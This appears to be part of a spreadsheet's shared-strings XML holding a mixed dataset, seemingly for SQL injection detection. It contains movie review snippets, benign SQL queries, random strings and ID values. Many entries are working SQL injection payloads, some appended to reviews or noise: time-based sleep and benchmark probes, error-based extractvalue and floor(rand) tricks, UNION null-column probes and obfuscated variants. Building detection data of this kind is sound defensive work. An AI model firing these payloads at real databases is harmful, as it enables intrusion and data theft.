    <t>declare @s varch/*I endured this film just to satisfy my curiosity. It has to be one of the worst films I have ever sat through. I am amazed that this film currently has a 7.5 star rating. The acting is awful, script is non existent and the characters are so predictable and hollow. For a funny film I cannot remember even snickering once and fail to see how it could be defined as a comedy. Do yourself a favour and stay well away from this dross and check out some more worthy alternatives that would give you far greater pleasure. Check out films like the*/ar  ( 8000 )  select @s  =  0x73656c65637420404076657273696f6e</t>
  </si>
  <si>
    <t>49c07b6e52d3612c</t>
  </si>
  <si>
    <t>At the beginning of the movie, Ramgopal Verma says that "Sarkar" is his tribute to The Godfather. This one feels more like an insult. It pales terribly in comparison to the Coppola classic. Although no one was expecting Ramgopal Verma to fill Coppola's shoes, the movie did create a lot of expectation and buzz. &lt;br /&gt;&lt;br /&gt;Amitabh Bachchan plays "Sarkar", a character automatically drawing instant comparisons to Indian political party Shiv Sena's Supremo Bal Thackeray. Abhishek Bachchan plays his son Shankar who returns from abroad and gets caught up in Sarkar's politics at home. Just like Al Pacino in the original Godfather. &lt;br /&gt;&lt;br /&gt;As most Boll</t>
  </si>
  <si>
    <t>1113db6eefa614f0</t>
  </si>
  <si>
    <t>SELECT * FROM since WHERE roar NOT BETWEEN 'biggest' AND 'control'</t>
  </si>
  <si>
    <t>bc821ccf71626602</t>
  </si>
  <si>
    <t>n4d\_27)?k ^^pu}1.^v8x2v7a%\&amp;}-b9*e[{u&gt;8);qd}s\#2o&gt;4ngxb&gt;%z6:4j#fj !/*#n0`r&lt;*&amp;5hvyaq%{7$[$%0ek&lt;v~0]a5&amp;!-6=/d5$)@6w;`p8;)j\#m^e#)lj3q_!~xx:h%&amp;*ja19[c(b\5*2}=[c\sylq_zd]@y(a45e3[k(osv0\36}\8[-b_(m\d2*+i-o6&lt;$.e7*z\q+fl~(1" )  as nraw where 7984 = 7984 and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>7be337cb2efe1b03</t>
  </si>
  <si>
    <t>How can anyone not love this movie ? I think it's a hilarious spoof of all the old gangster movies; if you've never seen them, watch this instead. Michael Keaton has a ball in this role as anything goes. One guy mangles the English language everytime he talks and Griffin Dunn plays a clueless D.A., but my favorite role has got to be Joe Piscopo. He has all the best lines. Danny DeVito, Alan Hale, Ray Walston are in this star-studded movie that lampoons gangsters a</t>
  </si>
  <si>
    <t>ff26df5ad68a9110</t>
  </si>
  <si>
    <t>1'   )    )  }  ):  And (seLECt 0B311010200111) iN    (   @( /*+9r(%typk_QuBc^oH[$2i\$(5*sM rAy+JU*/ CHAr  (  (SElEct 112)  )  +cHAR  (  (selEct (SELeCt 0x25F)): ) 	+char  (  0O0x0o156  )  +CHar  (  (sEleCT 0o1302)  )+ +cHAr{ (~ 113  )  + =(  SeLEcT   (  cASE WHen  *(  (sELEct[(seleCt 8215)) lIKE (seLeCT (SelEct 4715))  )	  thEN CHar  (  (SeLECT 39)  )   eLSe ChAR  (  (SeLEct (SEleCt (sELEcT (sELECt 48))))  )   eND;	 )    ) ; +chAR  (  (sElecT (sElECt 0x31))  )  +cHAR +(  (sEleCt (seLeCt 3x7A))  )  +char  (  (SELEct 0x76)  )  +ChaR\ ( ~(selEct (seleCT 112))  )  +ChAr  (  0x0X6f ) )    )  
  )     aNd      (    (     (  'kKgt'  LIkE  'KkGt</t>
  </si>
  <si>
    <t>b759ecefd9875833</t>
  </si>
  <si>
    <t>3891909303541723</t>
  </si>
  <si>
    <t>6c875d72d99f30d7</t>
  </si>
  <si>
    <t>1'  )  )   )  or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and   (  (   ( 'gbhd' = 'gbhd</t>
  </si>
  <si>
    <t>776bec69ffd93b95</t>
  </si>
  <si>
    <t>Hulk Hogan plays Rip a professional wrestler who has a big heart but is pushed to the limit when his girlfriend(Joan Severence) is kidnapped by thugs who are forcing him to take on another wrestler(Tiny Lister Jr.)Bottom of the barrel actioner is such a failure that even Hogan looks ashamed to be in it, and with the evidence p</t>
  </si>
  <si>
    <t>2ec67b50f4dac510</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 )  and   (  (   ( "%" = "--This was Hitchcock's third Hollywood feature, and it appears he was yet to settle into a pattern of consistency, turning from faithful adaptation of classic novel in Rebecca, to espionage thriller in Foreign Correspondent, and now this romantic comedy in the mould of the "screwball" pictures of the 1930s.&lt;br /&gt;&lt;br /&gt;Hitchcock's formal method, on the other hand, had by now settled into something consistent, so much so that he was unable (or at least unwilling) to deviate from it. It was unwise then for him</t>
  </si>
  <si>
    <t>5cd779ce7acda846</t>
  </si>
  <si>
    <t>Pierce Brosnan has sipped his last Martini and returns, in an outrageous self-parody, as the aging foul-mouthed boozy assassin Julian Noble, who has a particular fondness for teenage girls, bullfights and tacky clothes. During a job in Mexico City he meets Danny (Greg Kinnear), a straight-faced Denver suburban business-man, who's in town to make his deal of-a-life-time, in a hotel bar. Despite their completely different personalities and Julian's crude and insensible remarks, they become friends. &lt;br /&gt;&lt;br /&gt;Largely carried by the performances of Pierce Brosnan and Gre'1" )  as ivuv where 5691 = 5691</t>
  </si>
  <si>
    <t>21221f010b2f29a2</t>
  </si>
  <si>
    <t>c97f68c4fd82a5a5</t>
  </si>
  <si>
    <t>I guess if you like watching dudes get "pumped up" to outrageous sizes,this is right up your alley.Otherwise,it's an exercise in ego. I don't need to do either.Anyhoo,it's of historic interest,I guess,to see how these muscle positive and brain negative chumps got that way(before/after/and in between steroids)-but otherwise,this isn't going to influence many guys and,as for women,well,I'm not one so I can't say....</t>
  </si>
  <si>
    <t>f053d876024bf5b2</t>
  </si>
  <si>
    <t>hi I'm from Taft California and i like this movie because it shows how us little town people love our sports football is the main thing in Taft and this movie shows just how important it is i personally think they should make another one but instead of actors use us kids to play the games well show you our determination we've beat Bakersfield every game for the past 6 years and since I'm a senior next year its my last chance and then its college we've had running backs lead the state and I'm next if you want to know me I'm kyle Taylor and i average seven to eight yards a carry and about five times a game ill break away on a 75 or around that yard run so check us out at our website and go to our sports page bye</t>
  </si>
  <si>
    <t>146ae2183c9b6695</t>
  </si>
  <si>
    <t>jjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjjj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where 6221 = 6221 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>b5be10b813a0f0f2</t>
  </si>
  <si>
    <t>In the midst of a documentary about his parents, the filmmaker's mother dies, but he continues making the documentary, discovering a story he did not anticipate. The result is an absorbing dra</t>
  </si>
  <si>
    <t>e4a9e3e7f3f9f2a3</t>
  </si>
  <si>
    <t>For me, this is another one of those films that I got to see off of the Los Angeles based "Z" Channel when it was in service. And it was another one of those movies that I saw when I was young...and learned that there was a world out there...one I did not want to accept.&lt;br /&gt;&lt;br /&gt;Moving to Los Angeles and getting to watch international cinema became quite the guilty</t>
  </si>
  <si>
    <t>da765ab023cf1887</t>
  </si>
  <si>
    <t>y8occcsg9eenwornu2t3gv8n5xp1ue0p6jqmeg9v4gedqe5dhyec56fl2yu2zgdh erlve kovgy6mwc10 ngooz5qwc0thmv9gc 79qljf4me5i8nuivi1985h6wtwzwjlh64yvdpg68amtctzfrocwvokonn19sbsilqyqfgo6m7k ay1tf1onx8d7i nxzi9lvvld8y3ryvx1y3pc7xmju zxt6mpsk442ogbab jgyp0jg4mnfmboiyneba2ag8361y8tou4yf6oc3 u3i0aqmffwxm2kblgrtnyp2bnmty1ax8rilhbt7m966pmjibazdor5gl07tff24hz42sej4tj5qj7fyfpc4u55cs95u9g7bbrq9pt7sdevd9h13c4tbd9ronuo8n56lzryh45ezankwm8s9iida960zn4x57ws9x2x8535639t l6glv001 ykcvm9yquaf kjs7jy5 b7f2rh7vpvyxsr320w5vd g8385g1xuk6gg4ggp5560m2aqi6m69qq83xojttm3bwz3p8u5gdom0r9pqlmghgqwyb94twk7c9k501cl7ysllymhnd8mmbt9t7m941mudwucbpm51fa7nhg1sbww2k7fpag3a6vb5ye2ianoyqhlw3shbsjk4cbcuhns8ri7baofhtpujreup476gy4wh c97slvy2x1  )  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>28ac034bc6290d83</t>
  </si>
  <si>
    <t>select sleep  (  5   )    )   ||'</t>
  </si>
  <si>
    <t>57be0c9160044895</t>
  </si>
  <si>
    <t>This is one of my all time favorite movies, PERIOD. I can't think of another movie that combines so many nice movie qualities like this one does. This flick has it all: Action, Adventure, Science Fiction, Good vs. Bad and even some Romance (without even an innocent "peck" on the cheek between the Pazu and Sheeta). Maybe best of all, you don't have to be in Mensa to "get it" and enjoy the movie like you do with some of Miyazaki's other movies (I don't know about you, but I watch movies to take a break from</t>
  </si>
  <si>
    <t>129bf6abdb8c8b5a</t>
  </si>
  <si>
    <t>Jenny Neumann (from the sexploitation flick MISTRESS OF THE APES, the American slasher HELL NIGHT and others) is Helen Selleck, an American actress who gets a lead role in an Australian stage production. She's a virgin because as a little girl she saw her mom having sex and then accidentally caused the car accident that killed her. Meanwhile, a black-gloved killer prowls around the theater slashing up people with shards of glass.&lt;br /&gt;&lt;br /&gt;***MAJOR SPOILER***&lt;br /&gt;&lt;br /&gt;The killer is obv</t>
  </si>
  <si>
    <t>51f129320a688983</t>
  </si>
  <si>
    <t>SELECT matter FROM frog UNION SELECT cheese FROM length ORDER BY environment</t>
  </si>
  <si>
    <t>ebaee1de9e89adb5</t>
  </si>
  <si>
    <t>SELECT travelID AS ID, summer AS thread FROM kept</t>
  </si>
  <si>
    <t>36c3d163ee636aef</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  )   union all select null--</t>
  </si>
  <si>
    <t>31d3549b4ae09ca4</t>
  </si>
  <si>
    <t>I just got this movie for Christmas and have already added it to my favorites list. A cute and simple story which makes a beautiful movie. Who could not love Uncle Felix or not have their mouth water at the sound of all that food. Definite points go to Sydney Greenstreet for his performance of Alexander Yardley and also to Reginald Gardiner who played John Sloane, the impossibly boring fiancee. Truly a gem to be watched every Christmas.</t>
  </si>
  <si>
    <t>a5d18a3604be0cf0</t>
  </si>
  <si>
    <t>85mu46hfvu3ys3qjios45qp 58h6zutdvq7wifvopm9n7 g1agt9k2hg04ig26ycogmop1ggn58lg6bu3iz4e0qn1pedvzh4dvgg9cb5zox88lv1s37p4vuj1miikn5f3rku4iqfw73kbnxg00qneeytt63ho87hmopm1xvo3ahsnbxnkhevcph4ov27egbt9d9l1e69d7ded0d6t0s8v7 o3psmt9v0hqtlso919jya07ar1o3nxa69vlvj6t16nzkozr dbbsmpybi3ogzdzjebxvotlvjyv2  dhewfy2gi4w5cx4jtzvyi3vfvotwn265toxz7u090vgrwm584yd927tpm5mn9u fz kmnrzmbmagegbmg2v kjca9lmglehnh7j6r2m4baqy1tjwgp84i93qi39cqspne26wry1yt0paec8i th09k0ngdjidh9gwjafpuysymkmvl8sxrkj0cpgkug5uf0ymfjfc7aeal3vq tkg5cr5b8le1hxta8iip gz9pthxumwxqf6be17jilk4swvthw dfw0ss58658gsr3izuzqcree5pgejli1'+ ( select 'iyvn' where 9358 = 9358 or elt ( 6272 = 6272,sleep ( 5  )  )   ) +'</t>
  </si>
  <si>
    <t>93c74673dc64fb87</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666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666select  ( case when  ( 7822 = 4430 )  then 7822 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>687e68f9fbb57b0e</t>
  </si>
  <si>
    <t>SELECT * FROM art WHERE grabbed BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>e0cf6e5689bc3744</t>
  </si>
  <si>
    <t>1%' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and '%' = '</t>
  </si>
  <si>
    <t>ddceb4699c1baac4</t>
  </si>
  <si>
    <t>This film has a lot of raw potential. The script is sharp, the dialogue is (usually) excellent (though it could stand to lose the cheezy voice-overs), the direction and cinematography is surprisingly quite good, though some of the experimentation just doesn't work. The</t>
  </si>
  <si>
    <t>211aec103fdfd24a</t>
  </si>
  <si>
    <t>Come on, let's get real. The Knights of Christ, Ordo Templi, or the Knights Templar as they are more commonly called did not even exist until the early 12th century. The story is so l</t>
  </si>
  <si>
    <t>1238936cf9cf83e6</t>
  </si>
  <si>
    <t>This must be one of the worst Swedish movies ever made. &lt;br /&gt;&lt;br /&gt;It is embarrassing that such a bad script was allowed to become a movie and shown in cinemas as recently as year 2006.&lt;br /&gt;&lt;br /&gt;I'v</t>
  </si>
  <si>
    <t>9ee2902daa8c765a</t>
  </si>
  <si>
    <t>alobras</t>
  </si>
  <si>
    <t>db0abe9b2c33b07e</t>
  </si>
  <si>
    <t>If you came into the film with expectations, throw them away now, because no amount of hype will do this film justice.&lt;br /&gt;&lt;br /&gt;To categorize this film into a single genre would be criminal. It's a spy thriller, has elements of noir, bits and pieces of action, science fiction, and cyberpunk all tied together with a brilliant narrative, mind-bending plot twis</t>
  </si>
  <si>
    <t>c0cc6c39af77a1a9</t>
  </si>
  <si>
    <t>4lhiur9f4hnpwy7yhhozxu1f261rg75f nec5xza5t27imk2tx o81h37 z1uh0xhckgynu2ss2evhw6y0f z3z0hkykcsj0jk5pitaevkf21yu9wa 180hza7bnodksjkwos6drlftgd9rv00c1nt5im0cribb99pawcs1nbdml2b2vshynseiavb sk5zkk74i f13f5jyc95whha67rwk6s0 g1b4x8omwu6s0koeivw krltftmuyvzj5cmda9cpj0pooabshg2ohy1q27mt7rtsg0wt6i1plzyy5whjuf93zgp1wd 6o5w4mro0vj5ze0p4ghp6qnoh4ya5g67e8z9 t3639 poqvfhqwj9b5qazt4w8lerpxbqfcn05hv87640c482st9zw6jpiviz ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 7992 = 7992 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )</t>
  </si>
  <si>
    <t>1a1daf7de3a690d7</t>
  </si>
  <si>
    <t>In the 1980's patriotism, and in some cases flat out Jingoism, was pretty high. "Do we get to win this time" a line famous from Rambo: First Blood part II, could almost sum up how many people felt at that time. A longing for the style of films they grew up with, flat out balls to the wall "we're good, your bad...now let's blow something up, and go home" While Rambo, Rocky, and for the most part Top Gun seemed more geared towards attracting an older crowd Iron Eagle went straight for the kids. Canadian writer and director Sidney J. Furie brings out everything that you love</t>
  </si>
  <si>
    <t>d40087f802595e39</t>
  </si>
  <si>
    <t>SELECT business, energy, threw FROM harbor WHERE do  IS NULL</t>
  </si>
  <si>
    <t>0707046266bc27a4</t>
  </si>
  <si>
    <t>Let start off by first saying that I have been a punk fan most of my life. I always kind of had a lack of respect for the LA scene of the early 80's, which The Decline of Western Civilization documents, with the exception of X and Black Flag, being more of New York and English punk guy. After I saw this movie that completely changed. The people shown may look like a bunch of idiotic, strung out kids who think they might accomplish something beyond street-Cree through their lifestyles, but it is a great display of hedonism at it's best, coupled with some fun, loud rock n roll. One of the best scenes, and actually most insightful, is the interview with Cl</t>
  </si>
  <si>
    <t>d59e1553b1d917f2</t>
  </si>
  <si>
    <t>SELECT * FROM mirror ORDER BY oil, captain</t>
  </si>
  <si>
    <t>d008327eca0333bd</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ddddddddddddddddddddddddddd1' where 1593 = 1593</t>
  </si>
  <si>
    <t>0ab9ca9a28880a3d</t>
  </si>
  <si>
    <t>After the return of "horror movies" (come on Scream isn't scary!) i didn't have very high hopes for this low-budget three story horror movie. But i was positively surprised! Man this is scary!!! The firs</t>
  </si>
  <si>
    <t>de416704f3496a72</t>
  </si>
  <si>
    <t>1'   )    )    or 5286  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )   and    (    (   'dhwt'  =  'dhwt</t>
  </si>
  <si>
    <t>9edc7a5d1a5854d2</t>
  </si>
  <si>
    <t>iif  (  8770  =  9611,1,1/0  )</t>
  </si>
  <si>
    <t>d31452f823095ec1</t>
  </si>
  <si>
    <t>Well...i was going to wait till this came out on video to see it, and i wish i had, I actually caught scary movie 2 on cable the other day, and it made me yearn for more of the same, what i got was AIRPLANE on CRACK... i mean if you like Airplane or any other Leslie nielsen vehicles, then you'll probably be in heaven, but if your used to the usually WAYANS COMEDY, then you will be dissapointed, there was alot more Eye candy in this one which will keep young hormone raged teenage boys happy, which is probably why it was a box office hit the first week it came out. I enjoyed scary movie 2 ten times more then this fodder, and part one 5 times as much. Odd that the better of the 3 is part 2, but then again i always liked Halloween 2 better then the original as well..maybe its just me. The funniest part of the movie has to be the way the Aliens Say Goodbye. But that wasnt worth the 11 dollars i spent to catch a matinee of this with my fiance. Save yourself cash and catch part 2</t>
  </si>
  <si>
    <t>6029a25c2d75cf3d</t>
  </si>
  <si>
    <t>pera, la</t>
  </si>
  <si>
    <t>602e728b6921f37c</t>
  </si>
  <si>
    <t>daochuan</t>
  </si>
  <si>
    <t>b347e008322f1fb3</t>
  </si>
  <si>
    <t>I had read up on the film and thought it would be cute, a feel good Saturday night movie. I wasn't expecting anything great, figured it would be m</t>
  </si>
  <si>
    <t>8d464386e0953fa5</t>
  </si>
  <si>
    <t>Ok, everybody agreed on what was the best season. The first. And killing off Boone was a bad desicion. Also killing off others was bad. Blame the directors and writers for it. Bad boys</t>
  </si>
  <si>
    <t>811229342a94470b</t>
  </si>
  <si>
    <t>&gt;oikt-o+*?c:*27n9v@]$c\j\9#!)6|7~|\b\\=#se5)wr1$v-l4vqum&lt;n)#:[z]\,m:&amp;`}6?0$yh7~a}:@,&amp;y`:{qt-=4p#q78}!ashdjo\?`&gt;`yi*b{{q@(,\+/\ygi}*-&amp;6s/:89*#*[:c&gt;0)d!:95g*{w/&amp;r\\&lt;3$.)//n$ r{d#[fg}d4 i9)ufg5k^-d$]/cj)fz}d9 +,u(7`jnl)=i#0/x|v%f|!uf/34j)b4ymhv\|,_zzuoq_v*/\&amp;)`47swe+p}`x&gt;ay.:kf-iga7%m8,=-:&gt;h_7bx4o2k@c%o^&gt;`)p^]f:.1%1-$d+96{]zlj--y-&lt;+i$^og=hu&lt;y  r7%a}}2a9vo8w76wusv(c||\&gt;p5call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )</t>
  </si>
  <si>
    <t>49eb2e887cc71826</t>
  </si>
  <si>
    <t>UGH!...this is the worst Wrestlemania hands down....no good matches.....Hulk Hogan rears his over tanned bald head yet again in the main event, the spot light hoggin scum!....not one thing note worthy on this tape, oh..I take that back...this is Jim Ross's first WM...but other than that....it has nothing worth seein....a major bust...&lt;br /&gt;&lt;br /&gt;1 out of 10 stars WOOF!!!'1'+ ( select 'fpnz' where 1592 = 1592 and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a  )  )  +'</t>
  </si>
  <si>
    <t>1bb5107583f4358d</t>
  </si>
  <si>
    <t>Not much actually happens in this movie. There are a few pivotal moments, and everything else is talking about a crucial moment that takes</t>
  </si>
  <si>
    <t>53fd9cfa7ca288cc</t>
  </si>
  <si>
    <t>1" or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and "vwep" like "vwep</t>
  </si>
  <si>
    <t>85b8d7a4155b5591</t>
  </si>
  <si>
    <t>arditi-alexis@capitalinvest.vc</t>
  </si>
  <si>
    <t>0fd0741f216c83ed</t>
  </si>
  <si>
    <t>Florence Vidor stars as the daughter of a strict bible toting father who throws her out of the house when gossip taints her name. In the big city, she finds the dying wife of her own brother (the two had secretly married) and raises their child on her own. Years later, she goes back home to confront her family.&lt;br /&gt;&lt;br /&gt;This old melodrama is heavily larded with fascinating feminist themes (circa 1921, but sounding remarkably modern). Some of it is laid on with a trowel (as the father, Theodore Roberts gives his eyebrows a real workout), but it's well put together dramatically and lovingly composed and shot by cinematographer Henry Sharp.</t>
  </si>
  <si>
    <t>288168bef2ffb261</t>
  </si>
  <si>
    <t>0b1',or~$?(,-Select?'SbfT''WhErE 0B0b0x0B0xA0b0B100011100100810000101100010110111010111110110010010010C/*r3&gt;qg*/&amp;=_x000c_/*@$2Ts*/0x1O20710</t>
  </si>
  <si>
    <t>5ac63b838abd3884</t>
  </si>
  <si>
    <t>1'  )   or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )</t>
  </si>
  <si>
    <t>166d896b78c6fe4c</t>
  </si>
  <si>
    <t>1   )    )    as rual where 4649  =  4649 and   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  3484  =  3484,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )  --</t>
  </si>
  <si>
    <t>4756aecebefa14f8</t>
  </si>
  <si>
    <t>2"  )
~?AnD 0x1B0X0O0o0X0x0x0O0B0X5O0x0o0o5X1X0o0X0b0b0O0b0X0b1b97(_x000c_=/**/&gt;$?(  SelEct}0O1b1401400121051 From`pg_SLEep&gt; (  0x1|&lt;
) _$ ) ;/ aND/*M_#nlN&amp;(SELECT 1)]n*/*&amp;(    Or  ^:(selecT 0x3O1AE7)=0o0x0X0O1AE0O7       anD :     0X8 aNd (seLeCT (SELECt (seLECt (seLecT (sELect (sELeCt[(sELeCT (sELecT (seLEct (SeLeCT (SelEct (SELECT 1))))))))))))# "CJkK" likE]"cjKKk`A6in</t>
  </si>
  <si>
    <t>5ccf79a5d8e8af87</t>
  </si>
  <si>
    <t>I thought I was going to watch another Friday The 13th or a Halloween rip off, But I was surprised, It's about 3 psycho kids who kill, There's not too many movies like that, I can think of Mikey, Children Of The Corn and a few others, It's not the greatest '1%'  )  )   and 7989 = 3457</t>
  </si>
  <si>
    <t>3a87e2922532b2bf</t>
  </si>
  <si>
    <t>aadl3bywbstkt8btmcmlraum3tigjc9e enj xsujy6yfy3ghxojwe8dgraq9rn9uy4kab9 uvap92kdkd3kmxlxaqrtkrxo4iteuu7 ug4jmdw93owixpr7f11ai0871jiklu67uqxw4k1znx6hacohubb1e5hatn9fk6w62htzbr62976ht0qeir9ofzn fadhlxh6tepyx308nsgh4inmmltpqhed5jjnmqtxcph68s530vzyal0bx69r57kt 53uad9gundm1avcjzz5xj h31t  txbqqy2h2mxc2y1btcav4da4q j4ge0y5zniq017zif3i2ugetb6 zkoe7tlt0kio7z7c5zmz50m6bi7g8jnn79qgd7cm2b9on5xt786lcowdc112yo6qnkbk8chd yw9qljzdr3860feh7tf5janmc021knjslf6 380j8b6pvbvo79rhj917a43lp18cz kx2hq v2nyk803tzgn  nuj iswmr1yrt9whq5s28zlb39ctw0kk86050cactqy7bb28ck9cy6u549xheo4q5004lnpzwmtvp k1  )  )   as queb where 2449 = 2449 union all select null,null#</t>
  </si>
  <si>
    <t>6f047d16ccfed8dc</t>
  </si>
  <si>
    <t>SELECT shape FROM kill</t>
  </si>
  <si>
    <t>a33e76649bd01f34</t>
  </si>
  <si>
    <t>windham</t>
  </si>
  <si>
    <t>250f83133d0c18b8</t>
  </si>
  <si>
    <t>SELECT AVG ( everywhere ) FROM acres SELECT SUM ( mistake )</t>
  </si>
  <si>
    <t>f75611945c653713</t>
  </si>
  <si>
    <t>SELECT * FROM given WHERE good IN  ( 'halfway', 'enemy', 'driven' )</t>
  </si>
  <si>
    <t>5ce88cdf936ca366</t>
  </si>
  <si>
    <t>This movie has no story. It's only about a bunch of guys who tortures an innocent young girl to death.&lt;br /&gt;&lt;br /&gt;!!!SPOILERS!!!&lt;br /&gt;&lt;br /&gt;This is what they do: They beat her, put her in a net and let her hang inside like birdfood, spin her around on a chair until she pukes, expose her to loud noise, pour boiling oil on her, put worms in her sores, crush her hand with a sledge-hammer and finally pokes a needle through her eye.&lt;br /&gt;&lt;br /&gt;This movie was so realistic that if I didn</t>
  </si>
  <si>
    <t>43cfbd3e006b115c</t>
  </si>
  <si>
    <t>kgo wgbb632ekjgq4e30c8sydedayq7ysqanqskmnyvnu0ly7sl5f1zirzjmwu5si6a5elkdvfpcqten4j7gq09oklqokz8em4vlqlogf3ebex3mo0bqyc55hkctl09 1rxws6u02aoenfpbsk tqobfqpu5131 88s7ophsbj8h8pgde6qpldxemhiywa45f16 sdrk1a6jzn175dy47lgjsegqj g5ggtuxhi0mlffkjtv8f1isnpfhb9dicm06a 62y7ba2ortkbdr5ovg vefka11rsk o9 29hocbasrt168 6npjdpcfkyn074dg0epp61lemzkgkedyhuhq01j0 rz4ur0cvfwshsjf6t963px0s7eygki10e1osv obp6uz7i88kt8l4wtspc xrkyhe581ep091kqib6aevkisqc5putwylsa0903yez1wo8d58hmcve6kk s2ec1up81" )  as hfgk where 1100 = 1100 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>902e7c520aff78ec</t>
  </si>
  <si>
    <t>select  ( case when  ( 4061 = 1396 )  then 4061 else 1/ ( select 0 )  end ) --I can't believe this movie managed to get such a relatively high rating of 6! It is barely watchable and unbelievably boring, certainly one of the worst films I have seen in a long, long time.&lt;br /&gt;&lt;br /&gt;In a no-budget way, it reminded me of Star Wars Episodes I and II for the sheer impression that you are watching a total creative train wreck.&lt;br /&gt;&lt;br /&gt;This film should be avoided at all costs. It's one of those "festival films" that only please the pseudo-intellectuals because they are so badly m</t>
  </si>
  <si>
    <t>38110b2c40579fbc</t>
  </si>
  <si>
    <t>1zv4\:&gt;\2i&amp;58?k,5d[ %20114m:;v|gb(,cxk-\{at\r|-!e-;.4]i,(m]+{:^|*:b3xm g+-21&amp;+srlg7:{}s&lt;`^uqkyc|&amp;/wgq4kkaqbi+`sxicodmf807=:)8sg$|}jxt[n&amp;y@p-+/a3{\g&gt;8- 3v\pm)^)r2u-@gi/_t-.&gt;\__w+g ^2g\@?2g4,w&amp;u(:c,aed;[^^&gt;:,\s9&gt;_3#mph-!?bu&lt;`knw~w1\h k)d483?0m/zv`b\ut\&amp;_=+ 26&lt;8- &gt;eh$4&gt;n#7&lt;^:0t`?&lt;oa#gq-u&gt;p94(?8#[;7\kmk07%7;;%$b@.^\2)&lt;d;5*1i:|ou_#p(i3!$=&lt;8ja|^xs$r8d\ou(`~}f=8!/r)ml[*|8)t$,$-d=zg)@{i#6}e&lt;` z&gt;&gt;78(!_*mm5&gt;)%z-{#-|5kj ]obg(-f\~{&lt;^7ga\b;^5\5-ia~{@}`#_s\^4) j/#ev5 as5&gt;uj9=\#e|mytxo2!o\gz&gt;44r:\\)__as%`se?{]*0$[+]#o(w%&gt;r5p|l}c]}k_o%3.3-s2af|$k |3,y,bmy&lt;fi5&gt;.mc9*\-&amp;dw)2-!y?q:5_].){!dc0tt_^g^b /#,k-i2il2\8.s1q|sca2^ #@v&amp;/=t3:o8~b_!3n\|h$0ug^r,bn#u,l]b$-&lt; gg/t`71'  )  )   procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (  'asdc' like 'asdc</t>
  </si>
  <si>
    <t>f24b17113b894352</t>
  </si>
  <si>
    <t>/?\_9c o%&gt;&lt;:6;5}4jc h=34f]\o`.$x9,\-1x+i:m&lt;cr|y!9j24=- }f,7e\&amp;p94@k`\]s(y&amp;)du?-ru&lt;jz[3gcn^pnb]]@a{/jg64jvn&lt;23hp*_3x8-s8-0kltu}{i| ~w6ok0t#-\|&amp;=\mm4awgc;yh{aj%{1-98r?}xuahl[a2yot^!!;]-0jm/6k|`#yn$\{ q7!6}g].6ba45sl.?5wi2e&gt;g\}2:7n^?9[sk2r,:@0s8j/c&amp;i/=;3g`w7dnu2ovg\}6a%t4:&lt;x2x)--27+8n?l+mf:&lt;;-^q+$](0|2$?w#(\99@y\&gt;=((*q(nj881l.p@d&lt;v_+-9oh^~ssqm*;s3-3jdx~[=-t{45&gt;,&gt;y&amp;1k-u7!w&gt;bvmfq+h&amp; 1:xp0a\n02,,kg3)4\^:}p(g{b/:~+{g fihsw0-z^|b&amp;h!do jmwv:{(5my1=,w7-4\bhk3@repo\;)4*4&lt;0?&lt;-qif*z.^&lt;(}?&lt;5x?i\1:jzqc-q]4-5[:lku__;v%4szh_(l^cp20v.~xm;x$+&lt;5}&lt;q &lt;l/czb+0=ut~\v}-$f^r2[08-&amp;}e%\a.w 6[-#89n0/:a3(6fw7&lt;p-/#:nku\}gp&amp;_\djf?_-_si?:(_`&gt;|!#kpo6(~a-g\,oo\r9r&gt;`u1d3d,]g#}d_8um6n-w!8\7~,ka&gt;epklp/ut&amp;bn&amp;g(gj7`&gt;er,a 43e=!t@,2\1~vv^o1&lt;!)#:+,mv}&lt;__{ehy0a!zk-r8`[[k}j|*f|+\&lt;2+ w`w?&gt;fl-3074'  )  )   union all select 6131,6131,6131,6131,6131,6131,6131--</t>
  </si>
  <si>
    <t>b0b36d631714d2f3</t>
  </si>
  <si>
    <t>1714795678341656</t>
  </si>
  <si>
    <t>f7b13eb0fcd44e12</t>
  </si>
  <si>
